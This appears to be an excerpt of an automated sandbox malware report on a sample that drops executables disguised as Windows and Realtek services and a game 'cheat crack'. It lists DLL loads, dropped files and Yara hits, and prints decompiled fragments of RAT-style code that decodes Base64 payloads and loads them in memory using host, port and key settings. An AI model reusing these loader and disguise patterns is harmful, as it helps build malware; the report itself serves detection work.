                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeAutomated click: OK
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeAutomated click: Continue
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                          Source: EsgeCzT4do.exeStatic file information: File size 3260216 > 1048576

                          Data Obfuscation

                          barindex
                          Source: Realtek HD Audio Universal Service.exe.0.dr, DchiXXo1vBm1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b3Q2OKePItPMfMWknv3tRRhqamrC3qjsSumW85ZmffEuLbHpI2r26HcImUT8GSPkI4f6aD.pgKQPrUeoYXLEfKQbVjiiK2pzlSQHkSkWnjqBIoevBX6Lfm7VIzw1C6q0dmc2Cmav1L86Z,b3Q2OKePItPMfMWknv3tRRhqamrC3qjsSumW85ZmffEuLbHpI2r26HcImUT8GSPkI4f6aD.DiAxntOxJoHVbOjKNpniVZ6qzyjliCFk6QPKJjBpm4z3sQxCZaAOUeIqEHEWxPKSwVsWjt,b3Q2OKePItPMfMWknv3tRRhqamrC3qjsSumW85ZmffEuLbHpI2r26HcImUT8GSPkI4f6aD.XUG1qhLVZpn7TP41cdgw6thdgdVsOCIMIwnryAXUBmMv74n2zCQzh2e8KHW9EH97cMscrX,b3Q2OKePItPMfMWknv3tRRhqamrC3qjsSumW85ZmffEuLbHpI2r26HcImUT8GSPkI4f6aD._5kukWqZE9tKJwp1Csc6aB5PMQpA0kqf7IxT0xVjmZfNNejAj0p2n615ROic0IGATQRq3Q9,KO990wGfSKii.BH1BuNsAOFB7()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, DchiXXo1vBm1.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{rhCQ7VgBZgYt[2],KO990wGfSKii.d1PA3vEEdQut(Convert.FromBase64String(rhCQ7VgBZgYt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Windows Shell Experience Host.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Windows Shell Experience Host.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, DchiXXo1vBm1.cs.Net Code: _2Nu5J40IC6LL System.AppDomain.Load(byte[])
                          Source: Realtek HD Audio Universal Service.exe.0.dr, DchiXXo1vBm1.cs.Net Code: YlSNAfab0TDH System.AppDomain.Load(byte[])
                          Source: Realtek HD Audio Universal Service.exe.0.dr, DchiXXo1vBm1.cs.Net Code: YlSNAfab0TDH
                          Source: Windows Shell Experience Host.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: Windows Shell Experience Host.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: Windows Shell Experience Host.exe.0.dr, Messages.cs.Net Code: Memory
                          Source: Yara matchFile source: 4.0.SAM X CHEAT crack1.exe.1db14c70000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000000.2045244894.000001DB14D2F000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe, type: DROPPED
                          Source: SAM X CHEAT crack1.exe.0.drStatic PE information: 0xB8B7E08E [Thu Mar 15 17:31:58 2068 UTC]
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848DED2A5 pushad ; iretd 9_2_00007FF848DED2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848FD2316 push 8B485F95h; iretd 9_2_00007FF848FD231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848DFD2A5 pushad ; iretd 10_2_00007FF848DFD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F1A9A7 push esp; retf 10_2_00007FF848F1A9A8
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848FE2316 push 8B485F94h; iretd 10_2_00007FF848FE231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF848E1D2A5 pushad ; iretd 16_2_00007FF848E1D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF848F300BD pushad ; iretd 16_2_00007FF848F300C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF849002316 push 8B485F92h; iretd 16_2_00007FF84900231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF848E2D2A5 pushad ; iretd 20_2_00007FF848E2D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF848F400BD pushad ; iretd 20_2_00007FF848F400C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF849012316 push 8B485F91h; iretd 20_2_00007FF84901231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848DFD2A5 pushad ; iretd 23_2_00007FF848DFD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848F11038 push E956D11Eh; ret 23_2_00007FF848F11069
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848F100BD pushad ; iretd 23_2_00007FF848F100C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848F10FE8 push E956D11Eh; ret 23_2_00007FF848F11069
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848F1BAB8 push E856D0D7h; ret 23_2_00007FF848F1BAF9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848F1BAFB push E856D0D7h; ret 23_2_00007FF848F1BAF9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848FE2316 push 8B485F94h; iretd 23_2_00007FF848FE231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848DFD2A5 pushad ; iretd 25_2_00007FF848DFD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848F1BAB8 push E856D0D7h; ret 25_2_00007FF848F1BAF9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848F100BD pushad ; iretd 25_2_00007FF848F100C1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848FE2316 push 8B485F94h; iretd 25_2_00007FF848FE231B
                          Source: Realtek HD Audio Universal Service.exe.0.dr, pEJfpoTEU3qp.csHigh entropy of concatenated method names: 'pxPEcULJscrI', 'gc8l8mvGMuwD', 'FWlHjcqKooey', 'pX1viYJnAH7o', '_964MVqG97CFi', 'TE42NgjMfYL5', 'c1B5LjXMV6PA', '_8zOIng6fL8YC', 'HgWwAKQOytTq', 'FC63kG0frJgI'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, KO990wGfSKii.csHigh entropy of concatenated method names: 'Wwli4E76snP9', 'gP6gYgS8hbZY', 'ifNQgom89cgD', 'Xw0abrqBxljk', 'ZYzAUbWTbiqJ', 'i6FQ6pcNrPBd', '_2AgBexo44dIk', 'B2l6iXshtXPC', '_1cFO1T2FdZQ8', 'Zi6LBIBKnvrh'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, DchiXXo1vBm1.csHigh entropy of concatenated method names: 'RNUIwELBPnYH', '_2Nu5J40IC6LL', '_6LsnnLP3iWjb', 'pdC8zB7leTDv', '_8GdVqME66V1e', 'irmCB3hlUBvY', 'yU6p49gCc70t', 'IHsLMKglRbiz', 'LJDUXGniBt3p', 'P8CivTwrVaZW'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, beKVYf6Z1Oeq.csHigh entropy of concatenated method names: 'vAhEZLo2T1At', 'CtQmui89akKE', 'IcJsHXJywSMP', '_5rx0gA03Ju0R', 'Hw7NmT5e5baq', 'RguUpGtTztXZ', 'XqLjyWJz7eDY', 'TUzvOWztsmlu', '_9UzNxtAP1cdm', 'AoRAwvg6Mcmv'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, jrNSEUGgT7jjIIN0Y1gIn7u21uxmJX5C5K9wD7YtGvKXXYGe4UYCYFBplvdoHjhRSmCQqH.csHigh entropy of concatenated method names: 'RVVCzXAnBoxIsZ8YMbOAdCUYpVkVpHcgh4tPjcbEXmAryfmpSm8umbS2OghjYhwCYAogFl', 'PHhAmNiqF22rT5fUIN2nm4lZZXtz85rOKfNjGXEUFO6q35o1ASi6hbOsexq0XRh5waGw5j', 'yzCLYBCrQSVy33erHNQD0HQX6CHU2HGAGnILg8pF54utxxlPmB350bKHEHaMNz9Pt2SAR8', 'YgUWqBN0R1Sa9SPoYM0OkPBCOb0Fc0PNjEItQASE2VTgZk2DujMl12uF3cUAjQuC3PnRYV', 'oAG6bvRhkiCzvmRmh35hPuLFxBVyYEDZ4cnzszoDJ7w4YXLVFW8jx4WgOlIdEAVyQMgCtr', 'LI8y9q7Fj6zHhTIDq3BJLi2RLgqtqRo3I1Y1VNyMaNbYyjK45gk23xvkySFQC0BL68mEWI', 'eZKncnPQ96q2zFhw52BIIADQShq2seAf3fTnJPhm0TWhECUkdKqwc5tbCvo9XYi04L1AHo', 'qZpVLZEzKn2fOfWVAD8EF1fX2m1VF5OB4izTp4X0VloRcK0nqiyaTrK1VXDMF1lwEt90YC', 'mCCupTTBAilmgjnQ2MdfZAqW3lpM8jpFNUjvgXpoPStKS9ns9uX3gj9yrMD7pD9S0eSPQN', 'fwX4tCmszGsW10UDYjL2k6ULz2XWW81xpUUKb8FPzB3uqEmUAIWR7YiaNpqjhvtLuFeAPO'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csHigh entropy of concatenated method names: 'iSFcPzvA6Phgh8UErpcFjdOioFrONT9lR5AtVObjUMjG8xdvipxKZhAUX18ssv2rgLOKlx', 'Y2GEOc4uiNtddR93nKI8jJOWpEZTqSMu65yK3WXf59HfGAu5660fGTPR6NB2d55dvWsb0C', 'Ep6ENPBQZV0C1pRlbm2G5SPjyHKzLfqKna8h1ADLtd6c0d4qKivY968GVC1uaflCfllDtW', 'baJtJBLam93TkjbZUxC842eIixipc0EwY1dObbGRNqCFhlfsnWNWpmyBCisYsLQsRtcFd7', 'NBfRDUlh4KGhrt14cI6hkaAcgTUkDWjXDDvep9WoXv3GbXmbzgOMvaU7ofGjehkIMryrbS', '_6jbqQUwSYLvxU45EZieapOyv4qz7mUntKBdcBzaWZdIvYn25RKGg4xh28g67R2CYWXgu5g', 'HlQO4que7m8droAtTZJ31eBg7TpXP2SFbCMa1R7xvKhT2UDYjXhcBOfmsnH4FyFv8GIfem', 'ovh7MfRF7FU2jsYaseD2Dh8ofxplIi25dGjyLnGCaLccPNtylaIWO7NawUEuFc1UUh1Xrj', 'mqA2liAQaqz9ynGV9tduu51Lp2YLs1PMKvAIOsGplSoMRcuR6q2kH9kgdzjZASLR4PGNsm', 'RoZLHLRpDj5lHpfTr8zBBXTVMnTWYyTudQnPoFAWi1F62jzH6IjY2RgDy1vPvmeF6GNlUE'
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile created: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeJump to dropped file
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile created: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exeJump to dropped file
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile created: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeJump to dropped file
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
